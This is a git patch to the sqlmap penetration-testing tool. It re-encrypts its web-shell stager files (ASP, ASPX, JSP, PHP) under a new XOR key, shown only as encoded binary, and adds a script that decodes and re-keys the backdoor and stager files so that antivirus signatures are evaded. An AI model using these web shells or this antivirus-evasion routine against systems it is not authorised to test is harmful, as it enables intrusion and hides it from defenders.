From 95b9a47c6f8c0be73ffc3e954762c0297097f982 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 31 Aug 2020 11:34:12 +0200
Subject: [PATCH] Adding support for easier 'decloaking' (AV something
 something)

---
 data/shell/stagers/stager.asp_  | Bin 1201 -> 1201 bytes
 data/shell/stagers/stager.aspx_ | Bin 529 -> 529 bytes
 data/shell/stagers/stager.jsp_  | Bin 1321 -> 1321 bytes
 data/shell/stagers/stager.php_  | Bin 379 -> 379 bytes
 extra/cloak/cloak.py            |   2 +-
 extra/shutils/recloak.sh        |  14 ++++++++++++++
 lib/core/settings.py            |   2 +-
 7 files changed, 16 insertions(+), 2 deletions(-)
 create mode 100755 extra/shutils/recloak.sh

diff --git a/data/shell/stagers/stager.asp_ b/data/shell/stagers/stager.asp_
index b9dd8e7143936584da7d0a17299635fe55dc2926..ff0201d5fb013592d2a1ea1fd15a53370c9f7018 100644
GIT binary patch
literal 1201
zcmV;i1Wx-8#PR^P0o8L^PiU4-gc|rWT^%_*nP*BHGoof0?sc0P2MPUYU-IDDfY`f#
zv9m}BeD*{s*@`7s5ZDhoyrIelr|Tkg%|0kVbK1<E!RTs^&+x(T%~SF(M46AYbqE->
z22Z@@c0P0PZ!1eLp{SISFm@`N)x^TKNa>JQ^yOAQuMW%kz@R37v{y?bRw0fNsojK6
zC}|Dqz@1hO&6o=3w_YC7DOCK-^riUVQ888N2KLFXPn+yG`p=K-vVM7PgRjmTf%k&j
z158(cq-7ut#~T1>z@=wLGazWpRz+^GJd2k9{<#q!$hHe@@-JAqF>{<#FK&k*v`Xte
z?-AUF`Lx}I*5r!J)?E9l-@1lh(S96B4R}w1>QybNui(3ODli+)opxh?(R+jV9isqw
zo&`<f7f=Ui;D3Gmmn9bpRccus3TLPuc~(bL@R3NEkii)A1E_@v5;kb%X|j^D@b51m
zO~pN~UDm^eE6FpiUiEs%B#DA9ik}^=K<9(HB+JVe^HlMH@5HdA=5Y$`D#k55DZh1z
z(WH5Haf+aY>6PgaeX&EX$nG`Fbt;}dr*U%85%1U{Y=NqdoR+lsDcJ_lq;Mc>B(E{L
zd<@fk)slX|FY%7@+;}?uyd%bnGgmT?!_x6J76+0pua`!2bDe0QhR9wMk(L}MGjKr>
zaZmK!{BP)-GIPaj9Ho_+yOJ#TpWdm*^a!~_lG`qXb`GIN&rEe|gq#V5!NsZc2Z}CW
zO*~$TGPGev#(hza^zc?Vmt&>=S?v#&7di)P)Us|1?n->1>LqL*p*?C)Z7ewgGx>9j
zK1>KGS6ZNEV8KkC76O%Hu%|}R8*-VeaUYCQT(36^L+qi)n;pQZkH>}!d#0a=yPr23
zX#=btZnmh?aa3GQ)6tXRz*&4P6Lz5HOeK4Cb=PM%>^dVzxdwCh_0cylR!%JR%}fes
zz*bym!%cF(ShQcsa&PoFFyWzE_C@&`4NcQN?ncA>q6E_#+l1xh3adiW7CWAIQ{^hF
z*@mIspR|1W;6m|sPO~ncb0q#`zul36qJRL)cxYitknE*3AM850=j#c`aQPd#;T|BV
z9ia0>Z*X?;sJV`a4BeD5N5#*zJ2?gX9g<#7oeoLr&|$ZD8VVM{l}VMVM2yj=aWke(
zm927eOOwfddQRdKO@-U%M&zOkVBfXK{T!SR4hr{fY*&w=;<P*5OyyV}cN-7AHnh|x
z7F&A+7T^O>9*(bI8e((?<-lDzoh#txcWeVSJhX21$`Z_U#WImPRII!}CEq7#-R;6r
zNDeRbo}mmKiBjV+2^E06n8<giYhJN+?E;@{aO`RQ)*YGwxXlvxwl@Fmy@eg@Inuv=
zIgQB#S^v`iFeI`)xy0<S{W@v^M0!k`P?&LwE~6w3kghAWR;1zoi#nH+%QvOXF<I`p
zns}~hwZ-aJNsb=nPw(n!d8B|3$2M+HViU?uA~_mgtyKYWmJE-IbY3X{@^=o-;&j4A
zo|jrcDJ?_<_F^-s=Z*P}jD_{Kya#Xik^>Ri$<9xfYC78tuW6riHwgm%1g&&d1U)ok
PALCkbE8vz#dZTf^rn*u`

literal 1201
zcmV;i1Wx-p`OqV^Sc+F^5K)qEt`wUFU_Tl^z&LIzY@1>@#C!NGIxF642Cc;D-{HSr
zo4qSNLDXj|fYkwKPvHw2manNZn#loolwk~TEaS+$>*fi&^3vk$lnmA%8=#AoUj}=C
zJ8hrlFJV`}FcMD=i>CLd4O9u3jGN|$7toY;-s?3Bk}T-@ng0S$>uyg1d@t=Jl>etp
zaW*O1pQKVR=ay;GihMoMa0}S{tDOA7dp|bZJJjl|7R1O1rS^->m~a|fzK!h|*r=xK
zTy;}kj%!0W`Z*(OnfgO_Y#D6rd`k_50jah8r{*;;myZuj*daTN3{k&Ob}^$6>vQiM
z#UH=3#FqYskGrn?iDmzb^|a+`>|8%eR3~e(wQMPfh3?ox7ZNzl#3@HljzWjoH?3n#
zqbF|RP7fnkzeai8y(@G-Xh?b<Q#gz+CT~M>+Mg?}t>ZiQTKAziO%H6uL%i{Z&CLuW
z6q*^H0`JG90mo3AW7k>4eb%NP)utJYYU$vQ8R_U0steVzu>G`!%ztUv7vv5<aNtq7
zj-7p1TZF@~)VInLB<^RPm)9}vUnKntnp08INU;18Gq|p=wwTw=6#FI9{VxPtdzLku
zRsyg|=&)VGcCM<zgF!yrmMx{f4s{WXnvK;3Nj{bjg_$KmPQOc|-<NtL&aW5-8Ga%p
zOl{ZRr7+B_ZA!sSHmmlmhOiIx#(|CZt1-P|xYbRuODuv#mJ?B1+ocVp>&wc)I;ag}
z6k~e2ZH;AT>~k`^$<lQ@&OCw62Gk3;Jv3xq>5xqbw-s2BwH#<ai!%vjP!1XaYNl7b
zVRZ}%eN@9!UE^<_PhGK7@18>NF?{--Og*nr1@IF)9Mz@fu@j@5vgM@+BKf<x<fbz^
zLk-U>Q<RI)C<}OfjOdrZ>Q^5aE>wf%6?$JpD(+(z#xy{Egd|Y(td0`^33n*f=R#>x
z{d9k1ni5uz2aQ|kSYek94a0(2uNvJdQgqiJ#7LmYpC<4bg4@B=Rgy;YJT?77ZpR6z
zfZ2uaz>Rp=%1n|&bCC_BDtp>g;N+E{h>m0aMM^?R$+Lk4K-E5&&E;zSP1`uSxIqM&
zLYenvMSc~;m7A@LRf4bq82rnW5jSSZAh3N+#8GY9k65!=Fa&k<sB5;V9n<xfE()S-
zzoQXHcCqSxBN4_U61?BWZ0f;2UHz8Jq(itrQ8V*TMp^8X-<BBP6}o&bC?X4-9J;p?
zD|uK4ProN&LAR?xFl-ky*y4UV#B{{gC{+g(7P<|?_b~5woNcuV3zfKG579(j;LqVw
z5m5`o!I%g<qg;RlG&iHa!Ix8*G-tI`#|->gP0mXGk3zmN=kylVoH(4=fTuq1V2ztj
zX0**EbMdjt4F-`u;G4*Rq62OqZgelNZMss4cl-c7&zCQhe5!)VwivXKl4ybbZeZ$|
zuy)N{i08>v5Yal-5Z3NUQ>x=S`V>t}J526<eE=SQhg)Jqt1hgGEddQMtxgK>$a<l0
zqqTWMaB^TYsarRQ&4Ze|v8UFx<ycF|%{mqP<G?JVR~YyY_BOjiXfOufE~6J?IUg5b
PM!bGPblH+-P^}V+mbgjW

diff --git a/data/shell/stagers/stager.aspx_ b/data/shell/stagers/stager.aspx_
index efd39317c7065498c522b68f29304d2d2d875923..d7d399b1bfe0ae8fc555967b3d0e1843e53d5046 100644
GIT binary patch
literal 529
zcmV+s0`C0}#KHqM0quKTO_|61x?E-^@8{~>XDwzOa`Z#SA~h22#G_R;eeC#DG!&Gx
zmci5KF5F0mh0oPG4=VJWuzL1f+)lE<q%A@)$QG3PsEuhP6kUI@X_sLKeH4!DdEgtU
zTYO>Zi^mpUvasjqj|lh3Xmn>R@RYG}>ULj8`kG^XGq5UF)%M+49D7RMMJ3~Ln-W#m
zM7_JML?9mrRE?{BM9qYGPqsw})bPi$XVL^7yPDb>7_J*6_F$u_yn1u|T~4-bP_R3$
zZIT=<89gdA{^dyD#@&Cw&t!8uRFoVsXTY@bA@xAnEBi$Mw^QpWbm_VonvU=ZQ}>x0
zI|Z!Ne{Jx;!ZcZs)C~+J=t}SbPrRzovf5pQ*-&qOCs`$CYm)^V<L1CCHdQ*C5gT=p
z{6udzf(0S_1yai?$(m!fS@5<LoZJtJU83wB6cMdL2qa3^*5E^sd5jN_uY#INLM#A>
zQ~DJOU%4^)hy(IHI6f71JKiB6G;6FDUpRgbujdokcp+$HDOZf$mI1gf4#GD1MC3T-
zuOtGjrlGr(i_V1AkZRu@=9^dY0gdj%N8p|HT^V3XJ@p%9Ix^m(Jd=+E=VFvW_|Mvl
zAK;E!?Cx6yBYHpE)W^lKE~^*qEK;dmeB!x(o!Z$mr!d@W{8IPeZ1z+`rt40ivx9S|
T>mwrAg55AqM|BrOIdBWtsQd-x

literal 529
zcmV+s0`C1f`QRWmSh8Pj5}?D~kWvK`(#6T%K5{}WEzL*g2s?4u`GIyeB(vOPYb}tH
zyw9-G6aH(2+>r4KP!sUInsk+E;cSt^{c>gimoJdpf`bYXDSuqDFvvwWA}xx|Q|@@3
zW?n+-(wH)D?TO>br3RG!RaQhVsmql?wNG1S(3Aj34w4B~jH&r)LqbmfZ!3UArZ9HY
z9payz8yOoWeuKzJdGDus7U^L)i^;>2P26WIhPe3|LGeEnsadCpmUIxwU~H9c3GW}C
zGOHL2Gc!p6!^dmfpMqQPkX?5gewu#-TH=@Sc&cRSbizR1on43=Nz0iU!_m|^49=Z8
z5ev`ZLQm7Yn`?cbi!=xX!bFoaa-NCP>xFr=hG}bG4Od1}R<R}+y1C>VX>2~aI~5kB
z!DdV}+gb(7T5Hb;<CFk{WYU!v#e*xl0-NYRJ|E6^H3n(akH2T2CbbK$g^c-se-0yr
z3Z*eR0Dv{vq79J<1spbZVu1w^Yf`8;bv7M3lEpCFA%09$c5aCLybs$OGvF2a9lIRW
z@Erz?jIY?Cw(O_Y$u;{exuR3kD}#;pdcwZ;1V%)9V$2^z5Int?0kNzHzCEyUr}o~e
zHSX<i(ad-TdL<j{i~hlo1f_J?5parLCB2<b!sFc%jXu9#!En^$HK}lO`O->(nT-&V
T)&T+A+kzB+7)%po6Mkso(=Gff

diff --git a/data/shell/stagers/stager.jsp_ b/data/shell/stagers/stager.jsp_
index 2abd0225279c1fe465b24d6c8861f406f001cc88..5e021bffd57688898879ee43df1db8d2a7739600 100644
GIT binary patch
literal 1321
zcmV+^1=jix#L@u<0o4sz&bT*qC}ELPI0YlYy3`ItU5v=q=>jRr@_@eISUj`y=x7t!
z596qq#hySAXA`ElF^$u=y@X)IYkaFeh*;s<e{LgX7R0a1kTpo5R{U}|fJ2{US>%5(
zreL9~tbJ{3%tH-4Zd(nFh+HhF{n*QG5s!==ZpAm{-QdbCDTpMBqCscIgt&+B%l6RG
z!Hf69bVRH9W7;Qjb7^og`xz7XJNV6rp#70*ryHg@ESA*NHdT0_d4MM7WzjdU!GU^)
zRm9ENrX{Y4*FdjW5EZCRcE&yiL!6Bw0xB=6CNFdMPm(pKehf39#A+{^W$e3qSUu%~
zI%+G|JcMFE0fosHIp~S)3)$s?us;ewWnX@oJ3GbQz2#>ej`#eZu5*sYabMhd2+f-}
z%Hp;Rd2iYoR^^1%SeM}CU#i*NhaYW%@Y&lCZOr|vy_;CNcO<Sor8FcCgb-0sbmGn-
zLaJt~;}9$8SaBX;Bs|<*L-=TxK`?aInd3qOqX-(g!D0U|`+P!CZtNt1bu&E_Qfh*H
z;_HW`#Q&_(r%ZXkOq%9KjCr;tO19fR{d3GmFaFxowH`Vu&l;bfP9!<q1S`lBbcKq}
z_nd#G6U_+$1UqhOec$b#+wT$-t+5(}z2tNbP6ouEc>YdOqg_E)c^j<=TWAL{74^mP
z`4@mWK+)_A#3^pMs1;}5%<BeS|88Ofvbb(q{yrp(uHd|oho~GO*v-GAw^RFq!;EOB
z1jsi@jYw9c$>&QuF4ZjTiR~tAhB?3@ez<Sb;?{#kt|96wam&upJkq%Zp3_#zh?TES
zYAD~Y(D7D*+VuPR54nph&{@AWY>to;4l5V_tLxlBNw}-RggxcAw|fM%Qo5qS(v;3t
zeSr#ABjbTKUjD7ONKWOCfGUs$op%G$rr)neOGgG#tSP~f%|kTl1S%#|za5>i3#{$^
zZcc7Ji8@@D8r|j6T2NeKRy+SQl8QfCBjsclE0Q1Xqzdx+oN()`(8dIxz`T-$W4Z1m
z>8l}VF3#-xWLny4O#swgi<y}ibhvdp?g$*n3sV+w=;zds41#!tY*|AewtngbJ(d$q
zw6KrOWrEnC{ujDT^3~l)T$E+B>{VNz`P0_S81X(Z4-<^t)_(TmI6un<UYMUU?AM5>
zN#5|IWcHztW;ojJmjigqA6Fbm11E&Hf%n5sQhd6S^C0HdHs(elk&^hp&Pd^!Z+^NW
zu85gq#9WduIPx2EdypE!1QjhCMqX0eo|7)I6u`(`M5Vqy4c|L|>C2vFGN55$K?>^X
z$@~v|<S|2{BoUE0rB!Sr<Xyu=9f+wAHqpzp?x@*A2?6S$pIg3y^-rRRA3R5z|6kTd
z=&fkW&1ehV6(0NF7Hk6U=;tAZ2PM%^)7lY^##R^YB(6`Zq3-M|79jw15wDfh$Zqm1
z`>BuxKfw0cHXQMnvW(cu$$=|sj1V7-wUEXVlvlSFp(ZOXx^nN;=>uM&b#BOHHMjEl
z36y!8x@6GN>7NU9-moaGpeInkPa2`sM?SSpj5tj0{V#(zc{4veE6nj_3$~s3p%oe;
za>VUEzOAc-b5ic$9flzgcf1oHDy=U;vE!jz9&_Y8HPLUGy%M)>9}!y4pW^NlTSY1>
z9%dceS1<z91jJ)_?c<C&Q8v&eY;EhV<rgRMhnNqev$6am_o$1_vy$;m`tcbZmF!rm
fq+3ja-=G2U^x-|}ABbqt_qo^AAi%AB<sBOleC?cZ

literal 1321
zcmV+^1=jjH`S2nISc)lWk%2Q*0&ntW1t$Q)<BKYE0=3Nd!wgFQ&!U~&0b`fLw^0}P
zCGE?t_`G8iK1_m$ZnW2ymx=@NR$hoa(FeurAXg_uJj%@etru&e52IEG-+G%wbLt!g
zn?i!9^&&}IlX?jqL{)CMwSEt)q=)ZaPPT|VM9Wmr;KJ!HaMu93{di;NuD0aG_SEyz
znAFqrD}ArnNz_C~PD@iUqDD8!WWmX)iu3YcnmL6!b;<DLX>5FfQ;tQ`So0LDnBHEt
z3jN9Wj4RE&>SByrNlJ`;DgQbrX_D?2KL`w|e{fgF5UVkUR02?y`A7_zJhPum2L$1w
z5M)T=0j5DiSlaC-X3>qzA=ieqjU6dNJOEm$WCFqbm+J&5v(?|6_bjURE@s$RBE$Fs
z_rR48ATa(Z3EY76a+!nBVu<?Q-atvRui)P?N5Y<-fVq3QE_;d%`VAm2t{yUFNx<zQ
z8}&k)yeTiqa({hQ86N*$8mCOA9tm*wv+W@^o+>%Im_FMdq(w$>MB+!ZND&?v3pJ)p
zz0!k)?(xs$nr>Rd6~)4K(?GHWV7Ryoz)|l+cA@^`>L)%6<rMs?a|RmTU3BatE4+^H
z-I5%WF7GM=U1UmHBIfD8@!@eHkdrxw<hxKl5kJ7bQt&Njo_}IgAVi5c1W^MJKl`S~
z#5JQj8IH(1n-FT4f*S<t@yR7#rZGk{?SX20)G$Z6lfs{q-uE~WhxEIGon4r>{;o@;
zU6&Ji(s5FS<LM|46Za4A(6Rzt*#N`?RJIJ}-}InG_kPYAF7nFo7Tnq}qw#gh(aMW{
zH4)p6`u{bw=hoQzR_3o9k6^nOMu77tGYK^P^0fGI7J;wht}}*$idiSO3+0CKjjhUe
zSC4699>JnD2ce0F7kA;VswDF;pj9Bz|A32k6n+A5h9{z=@L?C~U3CIu;3S!lA)=1R
zQ*2E>&}De1Mdac0a9%%GYZ=@y%heldeB59*0i1l>nJCfv#V^mCkN*I^>ay{$UYpG)
zu=E93arfxjPE@&Ha3c3!(#E|gD}iwu#0G!;HgPp`vAFP{Q@ebmMpqyzi(JVDWXU&u
z>xql(PmH^j!!?;ttBUz}1Fd0|##=b5#PRjdL9QAAP%4Q0{BV`l1s&)G2gkbtv+j(E
zW6+b9S=54zKWF~l$U1!LHCcasJ_V<=*r?}z4Mo1Q*)E0S3&dq2$j#jFk#Xg_MR3^{
zld8I4oddQXXUiW`QJ#7CIX4a%9|3mj!Kx~dKF+IXd54`nRDd5(w(^=p7_I_Td??B3
zkfSS1y9h^v4j=Lin0HSgy#nWSLb0te9N(yc(~9~)P+rcEz+$?i-$B8>A|7O!rU3GG
zx0Gz^=VoZ=C_LEQPctUox85bEEi1BR?)Wl|p9wSFdzVX!i{OtRD+42UNbs@bmsj=;
z(Wmn;0^-%$Z$s6m?X}$N<Bv#Ru`)b}?9bvN%WktbizrANhfvJcuv~hPDp$-!AGwjt
zG`3op<2&@>wx$nN^u9}&odt8l7Da{S7zeRzrZz9zzzv`@AZ!~9boKQ_A-Mj{oHsck
zE1Ss<;gqkXSzL|PAfy5lF5@>Zb(AY$o9)7GBT>gcY>rE*;w!UHH6J<qqQK1%0vZk*
zL0=jAeLi8~Ip#onw7jSZ4iD4>Mq`MZ*fj+5-p4DG?1=aR-KOaHj<C{Bqpm$I%GF$p
fj#V$W;({Xbt-cxAK(TD_-M6&h9pa9Eyh1-AQ}&vF

diff --git a/data/shell/stagers/stager.php_ b/data/shell/stagers/stager.php_
index 1c974369ad188d0e9828473b4d28a96bc5033ef6..4d427ce130be7b8a19bb6371f425006bb90c287a 100644
GIT binary patch
literal 379
zcmV->0fhb!#M;G#1+@!R_KBYpQxC#5>&21_$Kr!wSo*=gjtrN}Q%Gy1^H66i&#fkj
z9>ngiB&05+6RE85AH4f$ff6@xOx3V6M%s)2F3CiLx+ua@bOVPxyHrqEUaI(_%L^<k
z>XkI)7kLxom@J<jR3gyX{4sN?C`_XBt2UdY_lYsW?ps*>wdcGkDg=>Q0AYxf`0<lN
zMq;i$c!osmjuwhN+dBU~FC8mY5Y&A!v%$b?Z?-5RlVFp5x_>K<s>zL)K63@ER=rZm
zJMU@UXAp#RpB;o8;$&M7a#*L-Kd1|V>mn>0-RpzAN>>$0O~Mwt$QD^|jsscFJWbpT
zOMwwtqT-T%WO5^;6q{m2Wp#Cbxl_ZI<IIvGMd7F&@)0v=enMgG?a_L?ozK@}dxVpj
z^lgBUH6FT;g(SjC8@9IH%0k4*jt^PIFF2_^O37?FfUrmyWZ3tS8zCNJRD}cqpZoWj
Z419u2N7RB#9Or!-k_H*4xFCsG+N^bpws-&l

literal 379
zcmV->0fhcK`S|9CT<R}nsj!<ec>$pS*5|PZp1r402gAjlqyqH*ZfZ!Ust-dOkdz{*
zG|G*d8HNp~O7@7rK!yKFs~l8CarcujABC^aaqvK*kS3vLNg<>^;tO<W0h9cL;RR0~
z*S8nvP9`_g#}%7Dek`->!4puaaTA8a^benf-G@^5(|LRT?6{a2bv>1PDsStd#nZ4r
zA3cf=C%-_=q!{T4<`~>Pc0vzjPwjaSna`tMQj`lJ%0IVF<wh^BfXD8l15qZg58`(D
zWY%r}O&;e#qCck}yE}hBEn%be6{cvk)&LI}gtVuO6>bq|XUuhu^)z~H*Ia%6V|3Up
zVUKcbpTMzwJuL^5OQL3EPkR<hgmK`Nx|6mN8rZBn*dI_`LtsMgw2oek!uHcbQHt=a
z$xow`Y(bvC+8xGgF}T&}_h9GC*HC@+Z~?6xV8;&(y^?DiJ%`hwL>L-Eev4-`qS@4%
ZRU@W+8105?Ht8NNuOvF8;eV}Yg_T*&x#j=>

diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py
index bdfd7b09a..c68b4a06b 100644
--- a/extra/cloak/cloak.py
+++ b/extra/cloak/cloak.py
@@ -21,7 +21,7 @@ if sys.version_info >= (3, 0):
     xrange = range
     ord = lambda _: _
 
-KEY = b"Beeth7hoyooleeF0"
+KEY = b"wXGWkn7KI0VhDOHS"
 
 def xor(message, key):
     return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
diff --git a/extra/shutils/recloak.sh b/extra/shutils/recloak.sh
new file mode 100755
index 000000000..07dd4aabe
--- /dev/null
+++ b/extra/shutils/recloak.sh
@@ -0,0 +1,14 @@
+#!/bin/bash
+
+# NOTE: this script is for dev usage after AV something something
+
+DIR=$(cd -P -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd -P)
+
+cd $DIR/../../data/shell
+find -regex ".*backdoor\.[a-z]*_" -or -regex ".*stager\.[a-z]*_" -type f -exec python ../../extra/cloak/cloak.py -d -i '{}' \;
+
+cd $DIR/../cloak
+sed -i 's/KEY = .*/KEY = b"'`python -c 'import random; import string; print("".join(random.sample(string.ascii_letters + string.digits, 16)))'`'"/g' cloak.py
+
+cd $DIR/../../data/shell
+find -regex ".*backdoor\.[a-z]*" -or -regex ".*stager\.[a-z]*" -type f -exec python ../../extra/cloak/cloak.py -i '{}' \;
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 1a0cc75e5..de19e2b97 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -18,7 +18,7 @@ from lib.core.enums import OS
 from thirdparty.six import unichr as _unichr
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.4.8.19"
+VERSION = "1.4.8.20"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)